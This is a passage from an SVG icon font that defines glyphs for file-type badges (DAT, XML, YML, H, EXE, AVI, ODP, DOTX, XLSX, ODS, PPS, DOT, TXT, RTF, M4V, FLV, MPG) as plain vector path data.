<glyph unicode="&#xec8f;" glyph-name="file-dat2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM576 416v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xec90;" glyph-name="file-xml" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM800 352v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xec91;" glyph-name="file-xml2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM320 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM528 448l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96zM800 352v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xec92;" glyph-name="file-yml" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM352 416v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96zM528 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM800 352v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xec93;" glyph-name="file-yml2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM352 416v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96zM528 448l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96zM800 352v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xec94;" glyph-name="file-h" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM576 448v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96z" />
<glyph unicode="&#xec95;" glyph-name="file-h2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM576 448v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96z" />
<glyph unicode="&#xec96;" glyph-name="file-exe" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM288 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM512 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM672 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96z" />
<glyph unicode="&#xec97;" glyph-name="file-exe2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM288 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM512 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM672 416v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96z" />
<glyph unicode="&#xec98;" glyph-name="file-avi" d="M224.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM223.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM528 376l48 168h32l-64-224h-32l-64 224h32l48-168zM672 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32z" />
<glyph unicode="&#xec99;" glyph-name="file-avi2" d="M224.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM528 376l48 168h32l-64-224h-32l-64 224h32l48-168zM672 512h-32v32h96v-32h-32v-160h32v-32h-96v32h32v160z" />
<glyph unicode="&#xec9a;" glyph-name="file-odp" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM448 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM320.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xec9b;" glyph-name="file-odp2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM448 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM320.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xec9c;" glyph-name="file-dotx" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160.235 608c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM160 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM192 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM416.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM415.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM608 512v-192h32v192h64v32h-160v-32h64zM800 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xec9d;" glyph-name="file-dotx2" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM192 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM416.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM415.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM608 512v-192h32v192h64v32h-160v-32h64zM800 432l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112z" />
<glyph unicode="&#xec9e;" glyph-name="file-xlsx" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160.235 608c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM224 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM512 352v-32h-160v224h32v-192h128zM608.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM800 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xec9f;" glyph-name="file-xlsx2" d="M159.817 640c-52.918 0-95.817-42.952-95.817-95.961v-224.078c0-52.998 42.898-95.961 95.817-95.961h736.366c52.918 0 95.817 42.952 95.817 95.961v224.078c0 52.998-42.898 95.961-95.817 95.961h-736.366zM224 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM512 352v-32h-160v224h32v-192h128zM608.156 544h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64zM800 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xeca0;" glyph-name="file-ods" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM448 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xeca1;" glyph-name="file-ods2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM448 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xeca2;" glyph-name="file-pps" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xeca3;" glyph-name="file-pps2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xeca4;" glyph-name="file-dot" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM512.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xeca5;" glyph-name="file-dot2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM512.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xeca6;" glyph-name="file-txt" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 512v-192h32v192h64v32h-160v-32h64zM512 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xeca7;" glyph-name="file-txt2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 512v-192h32v192h64v32h-160v-32h64zM512 432l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xeca8;" glyph-name="file-rtf" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM313.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM512 512v-192h32v192h64v32h-160v-32h64zM672 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xeca9;" glyph-name="file-rtf2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM313.6 416l64-96h38.4l-64 96c35.361 0.083 64 28.459 64 64 0 35.346-28.605 64-64.156 64h-95.844v-224h32v96h25.6zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM512 512v-192h32v192h64v32h-160v-32h64zM672 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecaa;" glyph-name="file-m4v" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM544 416h-57.6l57.6 80v-80zM544 384v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecab;" glyph-name="file-m4v2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM544 416v80l-57.6-80h57.6zM544 384v-64h32v64h32v32h-32v128h-32l-96-128v-32h96zM720 376l-48 168h-32l64-224h32l64 224h-32l-48-168z" />
<glyph unicode="&#xecac;" glyph-name="file-flv" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM288 448v64h128v32h-160v-224h32v96h96v32h-96zM608 352v-32h-160v224h32v-192h128zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecad;" glyph-name="file-flv2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM288 448h96v-32h-96v-96h-32v224h160v-32h-128v-64zM608 352v-32h-160v224h32v-192h128zM720 376l48 168h32l-64-224h-32l-64 224h32l48-168z" />
<glyph unicode="&#xecae;" glyph-name="file-mpg" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM336 448l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
